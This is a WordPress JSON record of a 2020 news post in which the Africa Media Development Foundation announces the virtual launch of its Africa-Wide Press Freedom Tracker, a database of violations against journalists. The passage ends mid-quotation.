{"id":8092,"date":"2020-09-20T07:43:30","date_gmt":"2020-09-20T06:43:30","guid":{"rendered":"https:\/\/amdf-centre.org\/?p=8092"},"modified":"2026-09-18T13:54:29","modified_gmt":"2026-09-18T12:54:29","slug":"amdf-set-to-launch-africa-wide-press-freedom-tracker","status":"publish","type":"post","link":"https:\/\/amdf-centre.org\/2020\/09\/20\/amdf-set-to-launch-africa-wide-press-freedom-tracker\/","title":{"rendered":"AMDF Set To Launch Africa-Wide Press Freedom Tracker"},"content":{"rendered":"<p>Africa Media Development Foundation (AMDF) says it has concluded plans for the virtual launch of its Africa-Wide Press Freedom Tracker, a database of Press Freedom violations in Africa, covering a period of over 30 years.<\/p>\n<p>To this end it has sent out a notice inviting media development organisations, journalists, rights activists, CSOs, NGOs, and other press freedom stakeholders to the virtual launch.<\/p>\n<p>According to the Executive Director of the Organisation, Iliya Kure, \u201cthe Tracker provides information on arrests, attacks, harassments, imprisonment and deaths of journalists on issues related to their work.\u201d<\/p>\n<p>He said the Tracker \u201cis meant to serve as source of useful information to press freedom advocates and researchers among other users.
